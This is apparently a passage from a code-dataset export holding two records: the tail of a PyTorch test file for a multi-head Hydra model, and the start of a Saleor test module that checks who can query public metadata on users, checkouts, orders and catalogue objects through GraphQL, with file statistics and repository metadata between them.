input_ = torch.rand(1, 16)
output_kv = hydra(input_)
assert (input_ == output_kv["features"]).sum().item() == 16
assert (input_ == output_kv["embeddings"]).sum().item() == 16
kv_keys = [
"features",
"embeddings",
"head1",
"_head2/",
"_head2/head2_1",
"_head2/_head2_2/",
"_head2/_head2_2/head2_2_1",
]
_check_lists(output_kv.keys(), kv_keys)
with pytest.raises(KeyError):
output_kv = hydra(input_, target1=torch.ones(1, 2).long())
with pytest.raises(KeyError):
output_kv = hydra(input_, target2=torch.ones(1, 2).long())
with pytest.raises(KeyError):
output_kv = hydra(input_, target1=torch.ones(1, 2).long(), target2=torch.ones(1, 2).long())
output_tuple = hydra.forward_tuple(input_)
assert len(output_tuple) == 5
assert (output_tuple[0] == output_kv["features"]).sum().item() == 16
assert (output_tuple[1] == output_kv["embeddings"]).sum().item() == 16
def test_config3():
"""@TODO: Docs. Contribution is welcome."""
config_path = Path(__file__).absolute().parent / "config3.yml"
config3 = utils.load_config(config_path)["model_params"]
hydra = Hydra.get_from_params(**config3)
config3_copy = copy.deepcopy(config3)
_pop_normalization(config3_copy)
encoder_params = config3_copy["encoder_params"]
heads_params = config3_copy["heads_params"]
heads_params["head1"]["hiddens"].insert(0, 16)
heads_params["_head2"]["_hidden"]["hiddens"].insert(0, 16)
heads_params["_head2"]["head2_1"]["hiddens"].insert(0, 16)
heads_params["_head2"]["_head2_2"]["_hidden"]["hiddens"].insert(0, 16)
heads_params["_head2"]["_head2_2"]["head2_2_1"]["hiddens"].insert(0, 16)
net = nn.ModuleDict(
{
"encoder": SequentialNet(**encoder_params),
"embedders": nn.ModuleDict(
{
"target1": nn.Sequential(
OrderedDict(
[
("embedding", nn.Embedding(embedding_dim=16, num_embeddings=2)),
("normalize", Normalize()),
]
)
),
"target2": nn.Sequential(
OrderedDict(
[("embedding", nn.Embedding(embedding_dim=16, num_embeddings=2))]
)
),
}
),
"heads": nn.ModuleDict(
{
"head1": nn.Sequential(
OrderedDict([("net", SequentialNet(**heads_params["head1"]))])
),
"_head2": nn.ModuleDict(
{
"_hidden": nn.Sequential(
OrderedDict(
[("net", SequentialNet(**heads_params["_head2"]["_hidden"]))]
)
),
"head2_1": nn.Sequential(
OrderedDict(
[
(
"net",
SequentialNet(**heads_params["_head2"]["head2_1"]),
),
("normalize", Normalize()),
]
)
),
"_head2_2": nn.ModuleDict(
{
"_hidden": nn.Sequential(
OrderedDict(
[
(
"net",
SequentialNet(
**heads_params["_head2"]["_head2_2"][
"_hidden"
]
),
)
]
)
),
"head2_2_1": nn.Sequential(
OrderedDict(
[
(
"net",
SequentialNet(
**heads_params["_head2"]["_head2_2"][
"head2_2_1"
]
),
)
]
)
),
}
),
}
),
}
),
}
)
_check_named_parameters(hydra.encoder, net["encoder"])
_check_named_parameters(hydra.heads, net["heads"])
_check_named_parameters(hydra.embedders, net["embedders"])
input_ = torch.rand(1, 16)
output_kv = hydra(input_)
assert (input_ == output_kv["features"]).sum().item() == 16
kv_keys = [
"features",
"embeddings",
"head1",
"_head2/",
"_head2/head2_1",
"_head2/_head2_2/",
"_head2/_head2_2/head2_2_1",
]
_check_lists(output_kv.keys(), kv_keys)
output_kv = hydra(input_, target1=torch.ones(1, 2).long())
kv_keys = [
"features",
"embeddings",
"head1",
"_head2/",
"_head2/head2_1",
"_head2/_head2_2/",
"_head2/_head2_2/head2_2_1",
"target1_embeddings",
]
_check_lists(output_kv.keys(), kv_keys)
output_kv = hydra(input_, target2=torch.ones(1, 2).long())
kv_keys = [
"features",
"embeddings",
"head1",
"_head2/",
"_head2/head2_1",
"_head2/_head2_2/",
"_head2/_head2_2/head2_2_1",
"target2_embeddings",
]
_check_lists(output_kv.keys(), kv_keys)
output_kv = hydra(input_, target1=torch.ones(1, 2).long(), target2=torch.ones(1, 2).long())
kv_keys = [
"features",
"embeddings",
"head1",
"_head2/",
"_head2/head2_1",
"_head2/_head2_2/",
"_head2/_head2_2/head2_2_1",
"target1_embeddings",
"target2_embeddings",
]
_check_lists(output_kv.keys(), kv_keys)
output_tuple = hydra.forward_tuple(input_)
assert len(output_tuple) == 5
assert (output_tuple[0] == output_kv["features"]).sum().item() == 16
assert (output_tuple[1] == output_kv["embeddings"]).sum().item() == 16
def test_config4():
"""@TODO: Docs. Contribution is welcome."""
config_path = Path(__file__).absolute().parent / "config4.yml"
config4 = utils.load_config(config_path)["model_params"]
with pytest.raises(AssertionError):
hydra = Hydra.get_from_params(**config4)
config4["in_features"] = 16
hydra = Hydra.get_from_params(**config4)
config4_copy = copy.deepcopy(config4)
_pop_normalization(config4_copy)
heads_params = config4_copy["heads_params"]
heads_params["head1"]["hiddens"].insert(0, 16)
heads_params["_head2"]["_hidden"]["hiddens"].insert(0, 16)
heads_params["_head2"]["head2_1"]["hiddens"].insert(0, 16)
heads_params["_head2"]["_head2_2"]["_hidden"]["hiddens"].insert(0, 16)
heads_params["_head2"]["_head2_2"]["head2_2_1"]["hiddens"].insert(0, 16)
net = nn.ModuleDict(
{
"encoder": nn.Sequential(),
"heads": nn.ModuleDict(
{
"head1": nn.Sequential(
OrderedDict([("net", SequentialNet(**heads_params["head1"]))])
),
"_head2": nn.ModuleDict(
{
"_hidden": nn.Sequential(
OrderedDict(
[("net", SequentialNet(**heads_params["_head2"]["_hidden"]))]
)
),
"head2_1": nn.Sequential(
OrderedDict(
[
(
"net",
SequentialNet(**heads_params["_head2"]["head2_1"]),
),
("normalize", Normalize()),
]
)
),
"_head2_2": nn.ModuleDict(
{
"_hidden": nn.Sequential(
OrderedDict(
[
(
"net",
SequentialNet(
**heads_params["_head2"]["_head2_2"][
"_hidden"
]
),
)
]
)
),
"head2_2_1": nn.Sequential(
OrderedDict(
[
(
"net",
SequentialNet(
**heads_params["_head2"]["_head2_2"][
"head2_2_1"
]
),
)
]
)
),
}
),
}
),
}
),
}
)
_check_named_parameters(hydra.encoder, net["encoder"])
_check_named_parameters(hydra.heads, net["heads"])
assert hydra.embedders == {}
input_ = torch.rand(1, 16)
output_kv = hydra(input_)
assert (input_ == output_kv["features"]).sum().item() == 16
assert (input_ == output_kv["embeddings"]).sum().item() == 16
kv_keys = [
"features",
"embeddings",
"head1",
"_head2/",
"_head2/head2_1",
"_head2/_head2_2/",
"_head2/_head2_2/head2_2_1",
]
_check_lists(output_kv.keys(), kv_keys)
with pytest.raises(KeyError):
output_kv = hydra(input_, target1=torch.ones(1, 2).long())
with pytest.raises(KeyError):
output_kv = hydra(input_, target2=torch.ones(1, 2).long())
with pytest.raises(KeyError):
output_kv = hydra(input_, target1=torch.ones(1, 2).long(), target2=torch.ones(1, 2).long())
output_tuple = hydra.forward_tuple(input_)
assert len(output_tuple) == 5
assert (output_tuple[0] == output_kv["features"]).sum().item() == 16
assert (output_tuple[1] == output_kv["embeddings"]).sum().item() == 16
| 38.869362
| 99
| 0.362261
| 1,698
| 24,993
| 4.985866
| 0.062426
| 0.046775
| 0.046775
| 0.052918
| 0.876093
| 0.854831
| 0.854831
| 0.837586
| 0.82601
| 0.82601
| 0
| 0.047136
| 0.522946
| 24,993
| 642
| 100
| 38.929907
| 0.66292
| 0.006042
| 0
| 0.661538
| 0
| 0
| 0.127755
| 0.010072
| 0
| 0
| 0
| 0.001558
| 0.037607
| 1
| 0.011966
| false
| 0
| 0.015385
| 0
| 0.02735
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
810c9506a70230f83d7101fa0e58658daef41b22
| 78,300
|
py
|
Python
|
tests/api/test_meta_queries.py
|
sebasgoldberg/saleor
|
2e94e8df80f305889434f549a4da6abc1257b598
|
[
"CC-BY-4.0"
] | 4
|
2021-04-09T01:07:00.000Z
|
2022-02-15T10:51:39.000Z
|
tests/api/test_meta_queries.py
|
sebasgoldberg/saleor
|
2e94e8df80f305889434f549a4da6abc1257b598
|
[
"CC-BY-4.0"
] | 14
|
2021-02-02T23:28:13.000Z
|
2022-03-12T01:00:31.000Z
|
tests/api/test_meta_queries.py
|
sebasgoldberg/saleor
|
2e94e8df80f305889434f549a4da6abc1257b598
|
[
"CC-BY-4.0"
] | 4
|
2020-05-08T07:17:03.000Z
|
2020-05-16T12:34:57.000Z
|
import graphene
from tests.api.utils import assert_no_permission, get_graphql_content
PRIVATE_KEY = "private_key"
PRIVATE_VALUE = "private_vale"
PUBLIC_KEY = "key"
PUBLIC_VALUE = "value"
QUERY_SELF_PUBLIC_META = """
{
me{
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_me_as_customer(user_api_client):
# given
me = user_api_client.user
me.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
me.save(update_fields=["metadata"])
# when
response = user_api_client.post_graphql(QUERY_SELF_PUBLIC_META)
content = get_graphql_content(response)
# then
metadata = content["data"]["me"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_me_as_staff(staff_api_client):
# given
me = staff_api_client.user
me.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
me.save(update_fields=["metadata"])
# when
response = staff_api_client.post_graphql(QUERY_SELF_PUBLIC_META)
content = get_graphql_content(response)
# then
metadata = content["data"]["me"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_USER_PUBLIC_META = """
query userMeta($id: ID!){
user(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_customer_as_staff(
staff_api_client, permission_manage_users, customer_user
):
# given
customer_user.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
customer_user.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("User", customer_user.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_USER_PUBLIC_META, variables, [permission_manage_users]
)
content = get_graphql_content(response)
# then
metadata = content["data"]["user"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_customer_as_service_account(
service_account_api_client, permission_manage_users, customer_user
):
# given
customer_user.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
customer_user.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("User", customer_user.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_USER_PUBLIC_META, variables, [permission_manage_users]
)
content = get_graphql_content(response)
# then
metadata = content["data"]["user"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_staff_as_other_staff(
staff_api_client, permission_manage_staff, admin_user
):
# given
admin_user.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
admin_user.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("User", admin_user.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_USER_PUBLIC_META, variables, [permission_manage_staff]
)
content = get_graphql_content(response)
# then
metadata = content["data"]["user"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_staff_as_service_account(
service_account_api_client, permission_manage_staff, admin_user
):
# given
admin_user.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
admin_user.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("User", admin_user.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_USER_PUBLIC_META, variables, [permission_manage_staff]
)
content = get_graphql_content(response)
# then
metadata = content["data"]["user"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_CHECKOUT_PUBLIC_META = """
query checkoutMeta($token: UUID!){
checkout(token: $token){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_checkout_as_anonymous_user(api_client, checkout):
# given
checkout.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
checkout.save(update_fields=["metadata"])
variables = {"token": checkout.pk}
# when
response = api_client.post_graphql(QUERY_CHECKOUT_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["checkout"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_other_customer_checkout_as_anonymous_user(
api_client, checkout, customer_user
):
# given
checkout.user = customer_user
checkout.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
checkout.save(update_fields=["user", "metadata"])
variables = {"token": checkout.pk}
# when
response = api_client.post_graphql(QUERY_CHECKOUT_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
assert not content["data"]["checkout"]
def test_query_public_meta_for_checkout_as_customer(user_api_client, checkout):
# given
checkout.user = user_api_client.user
checkout.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
checkout.save(update_fields=["user", "metadata"])
variables = {"token": checkout.pk}
# when
response = user_api_client.post_graphql(QUERY_CHECKOUT_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["checkout"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_checkout_as_staff(
staff_api_client, checkout, customer_user, permission_manage_checkouts
):
# given
checkout.user = customer_user
checkout.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
checkout.save(update_fields=["user", "metadata"])
variables = {"token": checkout.pk}
# when
response = staff_api_client.post_graphql(
QUERY_CHECKOUT_PUBLIC_META,
variables,
[permission_manage_checkouts],
check_no_permissions=False, # Remove after fix #5245
)
content = get_graphql_content(response)
# then
metadata = content["data"]["checkout"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_checkout_as_service_account(
service_account_api_client, checkout, customer_user, permission_manage_checkouts
):
# given
checkout.user = customer_user
checkout.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
checkout.save(update_fields=["user", "metadata"])
variables = {"token": checkout.pk}
# when
response = service_account_api_client.post_graphql(
QUERY_CHECKOUT_PUBLIC_META,
variables,
[permission_manage_checkouts],
check_no_permissions=False, # Remove after fix #5245
)
content = get_graphql_content(response)
# then
metadata = content["data"]["checkout"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_ORDER_BY_TOKEN_PUBLIC_META = """
query orderMeta($token: UUID!){
orderByToken(token: $token){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_order_by_token_as_anonymous_user(api_client, order):
# given
order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
order.save(update_fields=["metadata"])
variables = {"token": order.token}
# when
response = api_client.post_graphql(QUERY_ORDER_BY_TOKEN_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["orderByToken"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_order_by_token_as_customer(user_api_client, order):
# given
order.user = user_api_client.user
order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
order.save(update_fields=["user", "metadata"])
variables = {"token": order.token}
# when
response = user_api_client.post_graphql(QUERY_ORDER_BY_TOKEN_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["orderByToken"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_order_by_token_as_staff(
staff_api_client, order, customer_user, permission_manage_orders
):
# given
order.user = customer_user
order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
order.save(update_fields=["user", "metadata"])
variables = {"token": order.token}
# when
response = staff_api_client.post_graphql(
QUERY_ORDER_BY_TOKEN_PUBLIC_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["orderByToken"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_order_by_token_as_service_account(
service_account_api_client, order, customer_user, permission_manage_orders
):
# given
order.user = customer_user
order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
order.save(update_fields=["user", "metadata"])
variables = {"token": order.token}
# when
response = service_account_api_client.post_graphql(
QUERY_ORDER_BY_TOKEN_PUBLIC_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["orderByToken"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_ORDER_PUBLIC_META = """
query orderMeta($id: ID!){
order(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_order_as_anonymous_user(api_client, order):
# given
variables = {"id": graphene.Node.to_global_id("Order", order.pk)}
# when
response = api_client.post_graphql(QUERY_ORDER_PUBLIC_META, variables)
# then
assert_no_permission(response)
def test_query_public_meta_for_order_as_customer(user_api_client, order):
# given
order.user = user_api_client.user
order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
order.save(update_fields=["user", "metadata"])
variables = {"id": graphene.Node.to_global_id("Order", order.pk)}
# when
response = user_api_client.post_graphql(QUERY_ORDER_PUBLIC_META, variables)
# then
assert_no_permission(response)
def test_query_public_meta_for_order_as_staff(
staff_api_client, order, customer_user, permission_manage_orders
):
# given
order.user = customer_user
order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
order.save(update_fields=["user", "metadata"])
variables = {"id": graphene.Node.to_global_id("Order", order.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_ORDER_PUBLIC_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["order"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_order_as_service_account(
service_account_api_client, order, customer_user, permission_manage_orders
):
# given
order.user = customer_user
order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
order.save(update_fields=["user", "metadata"])
variables = {"id": graphene.Node.to_global_id("Order", order.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_ORDER_PUBLIC_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["order"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_DRAFT_ORDER_PUBLIC_META = """
query draftOrderMeta($id: ID!){
order(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_draft_order_as_anonymous_user(api_client, draft_order):
# given
variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}
# when
response = api_client.post_graphql(QUERY_DRAFT_ORDER_PUBLIC_META, variables)
# then
assert_no_permission(response)
def test_query_public_meta_for_draft_order_as_customer(user_api_client, draft_order):
# given
draft_order.user = user_api_client.user
draft_order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
draft_order.save(update_fields=["user", "metadata"])
variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}
# when
response = user_api_client.post_graphql(QUERY_DRAFT_ORDER_PUBLIC_META, variables)
# then
assert_no_permission(response)
def test_query_public_meta_for_draft_order_as_staff(
staff_api_client, draft_order, customer_user, permission_manage_orders
):
# given
draft_order.user = customer_user
draft_order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
draft_order.save(update_fields=["user", "metadata"])
variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_DRAFT_ORDER_PUBLIC_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["order"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_draft_order_as_service_account(
service_account_api_client, draft_order, customer_user, permission_manage_orders
):
# given
draft_order.user = customer_user
draft_order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
draft_order.save(update_fields=["user", "metadata"])
variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_ORDER_PUBLIC_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["order"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_FULFILLMENT_PUBLIC_META = """
query fulfillmentMeta($token: UUID!){
orderByToken(token: $token){
fulfillments{
metadata{
key
value
}
}
}
}
"""
def test_query_public_meta_for_fulfillment_as_anonymous_user(
api_client, fulfilled_order
):
# given
fulfillment = fulfilled_order.fulfillments.first()
fulfillment.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
fulfillment.save(update_fields=["metadata"])
variables = {"token": fulfilled_order.token}
# when
response = api_client.post_graphql(QUERY_FULFILLMENT_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["orderByToken"]["fulfillments"][0]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_fulfillment_as_customer(
user_api_client, fulfilled_order
):
# given
fulfillment = fulfilled_order.fulfillments.first()
fulfillment.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
fulfillment.save(update_fields=["metadata"])
fulfilled_order.user = user_api_client.user
fulfilled_order.save(update_fields=["user"])
variables = {"token": fulfilled_order.token}
# when
response = user_api_client.post_graphql(QUERY_FULFILLMENT_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["orderByToken"]["fulfillments"][0]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_fulfillment_as_staff(
staff_api_client, fulfilled_order, customer_user, permission_manage_orders
):
# given
fulfillment = fulfilled_order.fulfillments.first()
fulfillment.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
fulfillment.save(update_fields=["metadata"])
fulfilled_order.user = customer_user
fulfilled_order.save(update_fields=["user"])
variables = {"token": fulfilled_order.token}
# when
response = staff_api_client.post_graphql(
QUERY_FULFILLMENT_PUBLIC_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["orderByToken"]["fulfillments"][0]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_fulfillment_as_service_account(
service_account_api_client, fulfilled_order, customer_user, permission_manage_orders
):
# given
fulfillment = fulfilled_order.fulfillments.first()
fulfillment.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
fulfillment.save(update_fields=["metadata"])
fulfilled_order.user = customer_user
fulfilled_order.save(update_fields=["user"])
variables = {"token": fulfilled_order.token}
# when
response = service_account_api_client.post_graphql(
QUERY_FULFILLMENT_PUBLIC_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["orderByToken"]["fulfillments"][0]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_ATTRIBUTE_PUBLIC_META = """
query attributeMeta($id: ID!){
attribute(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_attribute_as_anonymous_user(api_client, color_attribute):
# given
color_attribute.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
color_attribute.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Attribute", color_attribute.pk)}
# when
response = api_client.post_graphql(QUERY_ATTRIBUTE_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["attribute"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_attribute_as_customer(user_api_client, color_attribute):
# given
color_attribute.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
color_attribute.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Attribute", color_attribute.pk)}
# when
response = user_api_client.post_graphql(QUERY_ATTRIBUTE_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["attribute"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_attribute_as_staff(
staff_api_client, color_attribute, permission_manage_products
):
# given
color_attribute.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
color_attribute.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Attribute", color_attribute.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_ATTRIBUTE_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["attribute"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_attribute_as_service_account(
service_account_api_client, color_attribute, permission_manage_products
):
# given
color_attribute.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
color_attribute.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Attribute", color_attribute.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_ATTRIBUTE_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["attribute"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_CATEGORY_PUBLIC_META = """
query categoryMeta($id: ID!){
category(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_category_as_anonymous_user(api_client, category):
# given
category.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
category.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Category", category.pk)}
# when
response = api_client.post_graphql(QUERY_CATEGORY_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["category"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_category_as_customer(user_api_client, category):
# given
category.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
category.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Category", category.pk)}
# when
response = user_api_client.post_graphql(QUERY_CATEGORY_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["category"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_category_as_staff(
staff_api_client, category, permission_manage_products
):
# given
category.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
category.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Category", category.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_CATEGORY_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["category"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_category_as_service_account(
service_account_api_client, category, permission_manage_products
):
# given
category.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
category.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Category", category.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_CATEGORY_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["category"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_COLLECTION_PUBLIC_META = """
query collectionMeta($id: ID!){
collection(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_collection_as_anonymous_user(api_client, collection):
# given
collection.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
collection.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Collection", collection.pk)}
# when
response = api_client.post_graphql(QUERY_COLLECTION_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["collection"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_collection_as_customer(user_api_client, collection):
# given
collection.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
collection.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Collection", collection.pk)}
# when
response = user_api_client.post_graphql(QUERY_COLLECTION_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["collection"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_collection_as_staff(
staff_api_client, collection, permission_manage_products
):
# given
collection.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
collection.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Collection", collection.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_COLLECTION_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["collection"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_collection_as_service_account(
service_account_api_client, collection, permission_manage_products
):
# given
